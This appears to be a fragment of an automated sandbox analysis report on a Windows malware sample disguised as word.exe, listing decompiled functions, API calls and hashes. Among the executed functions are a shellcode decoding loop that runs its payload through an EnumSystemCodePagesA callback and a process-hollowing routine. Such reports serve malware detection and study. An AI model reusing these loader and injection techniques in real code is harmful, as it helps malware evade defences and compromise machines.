                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: FileWritelstrlen
                                                          • String ID: C:\Users\user\AppData\Local\Temp
                                                          • API String ID: 427699356-2935972921
                                                          • Opcode ID: 43c287db0b9488ba1958c90e0c04839735a403a3c50cc02975388901bfa035a1
                                                          • Instruction ID: f3470f1ba8555a22246df6218562ebca8c23e151121f121bd8a2f796b88427a7
                                                          • Opcode Fuzzy Hash: 43c287db0b9488ba1958c90e0c04839735a403a3c50cc02975388901bfa035a1
                                                          • Instruction Fuzzy Hash: 97F0BE72A44241BED710EFA09E99AEF76A8CB00309F10043BB142F60C2D6FC4B419B2E
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00405E13 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24windowCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00405E13(int _a4) {
				struct tagMSG _v32;
				int _t5;
				int _t9;

				_t9 = _a4;
				while(1) {
					_t5 = PeekMessageA( &_v32, 0, _t9, _t9, 1);
					if(_t5 == 0) {
						break;
					}
					DispatchMessageA( &_v32);
				}
				return _t5;
			}






                                                          0x00405e1a
                                                          0x00405e30
                                                          0x00405e3a
                                                          0x00405e3e
                                                          0x00000000
                                                          0x00000000
                                                          0x00405e2a
                                                          0x00405e2a
                                                          0x00405e43

                                                          APIs
                                                          • DispatchMessageA.USER32 ref: 00405E2A
                                                          • PeekMessageA.USER32(?,00000000,?,?,00000001), ref: 00405E3A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: Message$DispatchPeek
                                                          • String ID: tCPInfo
                                                          • API String ID: 1770753511-2120998202
                                                          • Opcode ID: 427dd6a18e7e0659736ce79ff26561a4230ba81269168d82dcbc505d24d2deb6
                                                          • Instruction ID: b418400924ad5d261256fe136df885be693c5a8b8b6dcaec19dd907e9b62b21e
                                                          • Opcode Fuzzy Hash: 427dd6a18e7e0659736ce79ff26561a4230ba81269168d82dcbc505d24d2deb6
                                                          • Instruction Fuzzy Hash: B7E08673900118A7CA10AB99DC09ECB776CDB95750F004032FA01F71C4D6B4FA018AF5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0040562E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E0040562E(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}





                                                          0x0040562f
                                                          0x00405639
                                                          0x0040563b
                                                          0x00405642
                                                          0x0040564a
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040564a
                                                          0x0040564c
                                                          0x00405651

                                                          APIs
                                                          • lstrlenA.KERNEL32(80000000,C:\Users\user\AppData\Roaming,00402CEA,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Roaming\word.exe,C:\Users\user\AppData\Roaming\word.exe,80000000,00000003), ref: 00405634
                                                          • CharPrevA.USER32(80000000,00000000), ref: 00405642
                                                          Strings
                                                          • C:\Users\user\AppData\Roaming, xrefs: 0040562E
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: CharPrevlstrlen
                                                          • String ID: C:\Users\user\AppData\Roaming
                                                          • API String ID: 2709904686-2707566632
                                                          • Opcode ID: 5e76a858232fdb919b52e4d2bd39b139441124952f2503eefa3b06bf6f304fbe
                                                          • Instruction ID: 55d490dd391442433e5efd6983ceb3f41bba8d4964d1e45b55f62cb9bfffce1e
                                                          • Opcode Fuzzy Hash: 5e76a858232fdb919b52e4d2bd39b139441124952f2503eefa3b06bf6f304fbe
                                                          • Instruction Fuzzy Hash: EBD0C7A2409EB05EF30362149C04B9F7A58DF16711F494862F544A62A1C2785C428FAD
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00405740 Relevance: 5.0, APIs: 4, Instructions: 30stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00405740(CHAR* _a4, CHAR* _a8) {
				int _t10;
				int _t15;
				CHAR* _t16;

				_t15 = lstrlenA(_a8);
				_t16 = _a4;
				while(lstrlenA(_t16) >= _t15) {
					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
					_t10 = lstrcmpiA(_t16, _a8);
					if(_t10 == 0) {
						return _t16;
					}
					_t16 = CharNextA(_t16);
				}
				return 0;
			}






                                                          0x0040574c
                                                          0x0040574e
                                                          0x00405776
                                                          0x0040575b
                                                          0x00405760
                                                          0x0040576b
                                                          0x00000000
                                                          0x00405788
                                                          0x00405774
                                                          0x00405774
                                                          0x00000000

                                                          APIs
                                                          • lstrlenA.KERNEL32(?,?,00000000,00000000,0040594E,00000000,[Rename]), ref: 00405747
                                                          • lstrcmpiA.KERNEL32(?,?,?,?,?,00000000,00000000,0040594E,00000000,[Rename]), ref: 00405760
                                                          • CharNextA.USER32(?), ref: 0040576E
                                                          • lstrlenA.KERNEL32(?,?,?,00000000,00000000,0040594E,00000000,[Rename]), ref: 00405777
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                          • String ID:
                                                          • API String ID: 190613189-0
                                                          • Opcode ID: 2e32237a626722e8137879666343952be07cc79a6fe12a37d3b79e97bd5271ec
                                                          • Instruction ID: aca38312d8f432cd573fb0c64364face36d8f92203a8fe78b636acf1828773cc
                                                          • Opcode Fuzzy Hash: 2e32237a626722e8137879666343952be07cc79a6fe12a37d3b79e97bd5271ec
                                                          • Instruction Fuzzy Hash: 52F0A736249D51DAC2129B255C44D6B7A94EF91355F14057AF440F3180D335A815ABBB
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Executed Functions

                                                          Function 000F03F8 Relevance: 10.7, APIs: 7, Instructions: 201filememoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 0 f03f8-f04e3 GetPEB call f07a4 * 7 call f0772 CreateFileW 17 f05cd 0->17 18 f04e9-f04f3 0->18 19 f05cf-f05d3 17->19 23 f05c9-f05cb 18->23 24 f04f9-f0509 VirtualAlloc 18->24 21 f05fc-f0600 19->21 22 f05d5-f05d7 19->22 25 f05e4-f05e9 21->25 26 f0602-f0607 21->26 27 f05dd-f05e2 22->27 28 f05d9 22->28 34 f05c4-f05c7 23->34 24->23 31 f050f-f051e ReadFile 24->31 29 f05eb-f05f0 25->29 30 f05f2-f05f4 25->30 32 f0609-f0611 VirtualFree 26->32 33 f0614-f061a 26->33 27->21 28->27 29->21 35 f05fa 30->35 36 f05f6-f05f8 30->36 31->23 37 f0524-f0545 VirtualAlloc 31->37 32->33 34->19 35->21 36->21 39 f0547-f055c call f070b 37->39 40 f05c2 37->40 43 f055e-f0567 39->43 44 f0593-f05a7 call f07a4 39->44 40->34 45 f056a-f0591 call f070b 43->45 44->19 49 f05a9-f05ab 44->49 45->44 51 f05ad-f05ae CloseHandle 49->51 52 f05b1-f05c0 VirtualFree 49->52 51->52 52->34
                                                          APIs
                                                          • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 000F04DB
                                                          • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 000F0502
                                                          • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 000F0519
                                                          • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 000F053D
                                                          • CloseHandle.KERNELBASE(00000000,?), ref: 000F05AE
                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000,?), ref: 000F05B9
                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 000F0611
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.923103102.00000000000F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_f0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: Virtual$AllocFileFree$CloseCreateHandleRead
                                                          • String ID:
                                                          • API String ID: 721982790-0
                                                          • Opcode ID: ac91823fcceb24bdfeaa8284b71a33b08aac73ab2278b65ec93cbc451416ea79
                                                          • Instruction ID: d7da3fdcb9d68c781494c6fcc272250926e22fd52bde8bf1c9d536ee9a537f1a
                                                          • Opcode Fuzzy Hash: ac91823fcceb24bdfeaa8284b71a33b08aac73ab2278b65ec93cbc451416ea79
                                                          • Instruction Fuzzy Hash: 36619074F007189BDF10DBA4C884BBEBBB5AF88B10F148059EA05EB692D7B49D01DF54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 009B1D57 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 411 9b1d57-9b1d64 SetUnhandledExceptionFilter
                                                          C-Code - Quality: 100%
                                                          			E009B1D57(_Unknown_base(*)()* _a4) {
				_Unknown_base(*)()* _t2;

				_t2 = SetUnhandledExceptionFilter(_a4); // executed
				return _t2;
			}




                                                          0x009b1d5d
                                                          0x009b1d64

                                                          APIs
                                                          • SetUnhandledExceptionFilter.KERNEL32 ref: 009B1D5D
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.923253076.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000005.00000002.923232315.00000000009A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923391583.00000000009C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923447610.00000000009CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923481018.00000000009D2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled
                                                          • String ID:
                                                          • API String ID: 3192549508-0
                                                          • Opcode ID: 9c46a813a520d2a5eac862ba01a2e1387a370b8d402adeece15edf56c9245e4c
                                                          • Instruction ID: fb5143a330b1730fc4f432e317d94e2d797fa790d4b10fe2e7a9824a193787ae
                                                          • Opcode Fuzzy Hash: 9c46a813a520d2a5eac862ba01a2e1387a370b8d402adeece15edf56c9245e4c
                                                          • Instruction Fuzzy Hash: CAA0113000C20CAB8A002B82EC08888BF2CEA022A0B0000A0F80C000208B22A820AAA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 009A1000 Relevance: 10.6, APIs: 7, Instructions: 99memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          C-Code - Quality: 91%
                                                          			E009A1000(void* __edx) {
				int _v8;
				void* _t8;
				void* _t9;
				_Unknown_base(*)()* _t12;
				signed int _t21;
				signed int _t24;
				signed int _t27;
				void* _t29;
				signed int _t40;
				signed int _t41;
				signed int _t43;
				void* _t48;
				void* _t49;
				_Unknown_base(*)()* _t56;
				void* _t58;

				_t48 = __edx;
				_t58 = 0;
				_t8 = E009AE38B((CommandLineToArgvW(GetCommandLineW(),  &_v8))[1], 0x9ce000); // executed
				_t29 = _t8;
				_t9 = VirtualAlloc(0, 0x1ad27480, 0x3000, 4); // executed
				if(_t9 == 0) {
					return 0;
				} else {
					E009AE740(_t9, 0x99, 0x1ad27480);
					_t12 = VirtualAlloc(0, 0x12de, 0x3000, 0x40); // executed
					_t56 = _t12;
					E009AE68F(_t56, 0x12de, 1, _t29); // executed
					do {
						 *(_t56 + _t58) = (( *(_t56 + _t58) - 0x00000011 ^ 0x000000f0) - 0x00000064 ^ 0x0000001b) - 0x0000007c ^ 0x0000004c;
						_t58 = _t58 + 1;
					} while (_t58 < 0x12de);
					_t21 = EnumSystemCodePagesA(_t56, 0); // executed
					if(_t21 == 0xe12f) {
						_t49 = _t48 + 0xdb0e;
						_pop(_t40);
						_t41 =  !_t40;
						if(( !_t21 ^ 0x0000cd45) != 0x6082) {
							_t41 = 0xbc6b;
							_t49 = _t49 - 1;
						}
						_pop(_t24);
						_t27 = (_t24 & 0x000161dd) - 0xfffffffffffec5f9;
						_t43 =  !(_t41 - 0xb1b2);
						if(_t27 != 0xb7d3) {
							_t27 = _t27 & 0x00010f24;
							_t43 = _t43 + 0x158ad;
						}
						return _t27;
					} else {
						return _t21;
					}
				}
			}


















                                                          0x009a1000
                                                          0x009a100a
                                                          0x009a1022
                                                          0x009a102d
                                                          0x009a103e
                                                          0x009a1042
                                                          0x009ae292
                                                          0x009a1048
                                                          0x009a1053
                                                          0x009a1068
                                                          0x009a1072
                                                          0x009a1076
                                                          0x009a107e
                                                          0x009a108d
                                                          0x009a1090
                                                          0x009a1091
                                                          0x009a1098
                                                          0x009a10a3
                                                          0x009a10c3
                                                          0x009a10c9
                                                          0x009a10ca
                                                          0x009a10d6
                                                          0x009a10d9
                                                          0x009a10de
                                                          0x009a10de
                                                          0x009a10df
                                                          0x009a10e6
                                                          0x009a10f1
                                                          0x009a10fe
                                                          0x009a1101
                                                          0x009a110c
                                                          0x009a1112
                                                          0x009a1122
                                                          0x009a10a5
                                                          0x009a10b3
                                                          0x009a10b3
                                                          0x009a10a3

                                                          APIs
                                                          • GetCommandLineW.KERNEL32(?), ref: 009A100D
                                                          • CommandLineToArgvW.SHELL32(00000000), ref: 009A1014
                                                            • Part of subcall function 009AE38B: __wfsopen.LIBCMT ref: 009AE396
                                                          • VirtualAlloc.KERNELBASE(00000000,1AD27480,00003000,00000004), ref: 009A103E
                                                          • _memset.LIBCMT ref: 009A1053
                                                          • VirtualAlloc.KERNELBASE(00000000,000012DE,00003000,00000040), ref: 009A1068
                                                          • __fread_nolock.LIBCMT ref: 009A1076
                                                          • EnumSystemCodePagesA.KERNEL32(00000000,00000000), ref: 009A1098
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.923253076.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000005.00000002.923232315.00000000009A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923391583.00000000009C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923447610.00000000009CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923481018.00000000009D2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: AllocCommandLineVirtual$ArgvCodeEnumPagesSystem__fread_nolock__wfsopen_memset
                                                          • String ID:
                                                          • API String ID: 888471934-0
                                                          • Opcode ID: 4e575d93ae745fd6906b45574bc25acebd465c2f819347f34fc8012e3b7d6426
                                                          • Instruction ID: cf1c75c39596ef5f68149554becab00d9d945a78adc6aec58eea021e2ac2f9d6
                                                          • Opcode Fuzzy Hash: 4e575d93ae745fd6906b45574bc25acebd465c2f819347f34fc8012e3b7d6426
                                                          • Instruction Fuzzy Hash: 37217C776586043BF32426B4EC5BFFB3A5DD781308F594539F701DA1C2DE6CA98242A8
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000F1015 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 236processCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 70 f1015-f10c3 call f06f7 call f07a4 * 7 87 f10c6-f10ca 70->87 88 f10cc-f10e0 87->88 89 f10e2-f10ef 87->89 88->87 90 f10f2-f10f6 89->90 91 f110e-f112a 90->91 92 f10f8-f110c 90->92 94 f112c-f112f 91->94 95 f1134-f115e CreateProcessW 91->95 92->90 96 f12d7-f12d8 94->96 98 f1168-f1181 95->98 99 f1160-f1163 95->99 101 f118b-f11a5 ReadProcessMemory 98->101 102 f1183-f1186 98->102 99->96 103 f11af-f11b8 101->103 104 f11a7-f11aa 101->104 102->96 105 f11ba-f11c9 103->105 106 f11e2-f1202 VirtualAllocEx 103->106 104->96 105->106 107 f11cb-f11d8 call f0360 105->107 108 f120c-f1224 call f0261 106->108 109 f1204-f1207 106->109 107->106 116 f11da-f11dd 107->116 114 f122e-f1232 108->114 115 f1226-f1229 108->115 109->96 117 f123b-f1245 114->117 115->96 116->96 118 f127c-f1298 call f0261 117->118 119 f1247-f1275 call f0261 117->119 125 f129f-f12bd Wow64SetThreadContext 118->125 126 f129a-f129d 118->126 122 f127a 119->122 122->117 127 f12bf-f12c2 125->127 128 f12c4-f12c7 call f01b2 125->128 126->96 127->96 130 f12cc-f12ce 128->130 131 f12d5 130->131 132 f12d0-f12d3 130->132 131->96 132->96
                                                          APIs
                                                          • CreateProcessW.KERNEL32(?,00000000), ref: 000F1159
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.923103102.00000000000F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_f0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: CreateProcess
                                                          • String ID: D
                                                          • API String ID: 963392458-2746444292
                                                          • Opcode ID: fa090b6a6734da87d4db60132989cd82d466b43500cf08a9aca2b273afd475e8
                                                          • Instruction ID: 363cdfaaafe3f4f704d9c9a976f23b8946fd600999ab4cb753eb3204c487b127
                                                          • Opcode Fuzzy Hash: fa090b6a6734da87d4db60132989cd82d466b43500cf08a9aca2b273afd475e8
                                                          • Instruction Fuzzy Hash: 05A1D270E0020DEFDB90DBA5C981BEEBBB5BF48304F2040A9E615EB651D775AA51EF10
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000F0809 Relevance: 7.7, APIs: 5, Instructions: 206fileCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 133 f0809-f09e9 call f06f7 call f07a4 * 10 CreateFileW 159 f09ed-f09fc 133->159 160 f09eb 133->160 163 f09fe 159->163 164 f0a00-f0a16 VirtualAlloc 159->164 161 f0a53-f0a54 160->161 163->161 165 f0a1a-f0a2e ReadFile 164->165 166 f0a18 164->166 167 f0a32-f0a50 CloseHandle call f0a55 call f0cef ExitProcess 165->167 168 f0a30 165->168 166->161 168->161
                                                          APIs
                                                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 000F09DF
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.923103102.00000000000F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_f0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID:
                                                          • API String ID: 823142352-0
                                                          • Opcode ID: 850f1c6363aedebf560b8a6955ee5afce56935f5c30a1746b72258c0d9977697
                                                          • Instruction ID: c8a6bf8da7fb10ea114d186ce164d3e686190fe81856b5d9d848f5cb55041677
                                                          • Opcode Fuzzy Hash: 850f1c6363aedebf560b8a6955ee5afce56935f5c30a1746b72258c0d9977697
                                                          • Instruction Fuzzy Hash: 0D714A35E5034CAADF60DBE4E912BFDB7B5AF88710F20545AE608EA2E1D7711A40EB05
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 009AE4CA Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 173 9ae4ca-9ae4e3 174 9ae500 173->174 175 9ae4e5-9ae4ea 173->175 177 9ae502-9ae508 174->177 175->174 176 9ae4ec-9ae4ee 175->176 178 9ae509-9ae50e 176->178 179 9ae4f0-9ae4f5 call 9af100 176->179 181 9ae51c-9ae520 178->181 182 9ae510-9ae51a 178->182 190 9ae4fb call 9aeb1e 179->190 185 9ae522-9ae52d call 9ae740 181->185 186 9ae530-9ae532 181->186 182->181 184 9ae540-9ae54f 182->184 188 9ae551-9ae554 184->188 189 9ae556 184->189 185->186 186->179 187 9ae534-9ae53e 186->187 187->179 187->184 193 9ae55b-9ae560 188->193 189->193 190->174 195 9ae649-9ae64c 193->195 196 9ae566-9ae56d 193->196 195->177 197 9ae5ae-9ae5b0 196->197 198 9ae56f-9ae577 196->198 199 9ae61a-9ae61b call 9af572 197->199 200 9ae5b2-9ae5b4 197->200 198->197 201 9ae579 198->201 208 9ae620-9ae624 199->208 203 9ae5d8-9ae5e3 200->203 204 9ae5b6-9ae5be 200->204 205 9ae57f-9ae581 201->205 206 9ae677 201->206 211 9ae5e7-9ae5ea 203->211 212 9ae5e5 203->212 209 9ae5ce-9ae5d2 204->209 210 9ae5c0-9ae5cc 204->210 213 9ae588-9ae58d 205->213 214 9ae583-9ae585 205->214 207 9ae67b-9ae684 206->207 207->177 208->207 215 9ae626-9ae62b 208->215 216 9ae5d4-9ae5d6 209->216 210->216 217 9ae5ec-9ae5f8 call 9af693 call 9af84a 211->217 218 9ae651-9ae655 211->218 212->211 213->218 219 9ae593-9ae5ac call 9af6b7 213->219 214->213 215->218 220 9ae62d-9ae63e 215->220 216->211 234 9ae5fd-9ae602 217->234 221 9ae667-9ae672 call 9af100 218->221 222 9ae657-9ae664 call 9ae740 218->222 230 9ae60f-9ae618 219->230 225 9ae641-9ae643 220->225 221->190 222->221 225->195 225->196 230->225 235 9ae608-9ae60b 234->235 236 9ae689-9ae68d 234->236 235->206 237 9ae60d 235->237 236->207 237->230
                                                          C-Code - Quality: 69%
                                                          			E009AE4CA(char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
				char* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __esi;
				signed int _t74;
				signed int _t78;
				char _t81;
				signed int _t86;
				signed int _t88;
				signed int _t91;
				signed int _t94;
				signed int _t97;
				signed int _t98;
				char* _t99;
				signed int _t100;
				signed int _t102;
				signed int _t103;
				signed int _t104;
				char* _t110;
				signed int _t113;
				signed int _t117;
				signed int _t119;
				void* _t120;

				_t99 = _a4;
				_t74 = _a8;
				_v8 = _t99;
				_v12 = _t74;
				if(_a12 == 0) {
					L5:
					return 0;
				}
				_t97 = _a16;
				if(_t97 == 0) {
					goto L5;
				}
				if(_t99 != 0) {
					_t119 = _a20;
					__eflags = _t119;
					if(_t119 == 0) {
						L9:
						__eflags = _a8 - 0xffffffff;
						if(_a8 != 0xffffffff) {
							_t74 = E009AE740(_t99, 0, _a8);
							_t120 = _t120 + 0xc;
						}
						__eflags = _t119;
						if(_t119 == 0) {
							goto L3;
						} else {
							_t78 = _t74 | 0xffffffff;
							__eflags = _t97 - _t78 / _a12;
							if(_t97 > _t78 / _a12) {
								goto L3;
							}
							L13:
							_t117 = _a12 * _t97;
							__eflags =  *(_t119 + 0xc) & 0x0000010c;
							_t98 = _t117;
							if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
								_t100 = 0x1000;
							} else {
								_t100 =  *(_t119 + 0x18);
							}
							_v16 = _t100;
							__eflags = _t117;
							if(_t117 == 0) {
								L41:
								return _a16;
							} else {
								do {
									__eflags =  *(_t119 + 0xc) & 0x0000010c;
									if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
										L24:
										__eflags = _t98 - _t100;
										if(_t98 < _t100) {
											_t81 = E009AF572(_t98, _t119, _t119); // executed
											__eflags = _t81 - 0xffffffff;
											if(_t81 == 0xffffffff) {
												L46:
												return (_t117 - _t98) / _a12;
											}
											_t102 = _v12;
											__eflags = _t102;
											if(_t102 == 0) {
												L42:
												__eflags = _a8 - 0xffffffff;
												if(_a8 != 0xffffffff) {
													E009AE740(_a4, 0, _a8);
												}
												 *((intOrPtr*)(E009AF100())) = 0x22;
												L4:
												E009AEB1E();
												goto L5;
											}
											_t110 = _v8;
											 *_t110 = _t81;
											_t98 = _t98 - 1;
											_v8 = _t110 + 1;
											_t103 = _t102 - 1;
											__eflags = _t103;
											_v12 = _t103;
											_t100 =  *(_t119 + 0x18);
											_v16 = _t100;
											goto L40;
										}
										__eflags = _t100;
										if(_t100 == 0) {
											_t86 = 0x7fffffff;
											__eflags = _t98 - 0x7fffffff;
											if(_t98 <= 0x7fffffff) {
												_t86 = _t98;
											}
										} else {
											__eflags = _t98 - 0x7fffffff;
											if(_t98 <= 0x7fffffff) {
												_t44 = _t98 % _t100;
												__eflags = _t44;
												_t113 = _t44;
												_t91 = _t98;
											} else {
												_t113 = 0x7fffffff % _t100;
												_t91 = 0x7fffffff;
											}
											_t86 = _t91 - _t113;
										}
										__eflags = _t86 - _v12;
										if(_t86 > _v12) {
											goto L42;
										} else {
											_push(_t86);
											_push(_v8);
											_push(E009AF693(_t119)); // executed
											_t88 = E009AF84A(); // executed
											_t120 = _t120 + 0xc;
											__eflags = _t88;
											if(_t88 == 0) {
												 *(_t119 + 0xc) =  *(_t119 + 0xc) | 0x00000010;
												goto L46;
											}
											__eflags = _t88 - 0xffffffff;
											if(_t88 == 0xffffffff) {
												L45:
												_t64 = _t119 + 0xc;
												 *_t64 =  *(_t119 + 0xc) | 0x00000020;
												__eflags =  *_t64;
												goto L46;
											}
											_t98 = _t98 - _t88;
											__eflags = _t98;
											L36:
											_v8 = _v8 + _t88;
											_v12 = _v12 - _t88;
											_t100 = _v16;
											goto L40;
										}
									}
									_t94 =  *(_t119 + 4);
									_v20 = _t94;
									__eflags = _t94;
									if(__eflags == 0) {
										goto L24;
									}
									if(__eflags < 0) {
										goto L45;
									}
									__eflags = _t98 - _t94;
									if(_t98 < _t94) {
										_t94 = _t98;
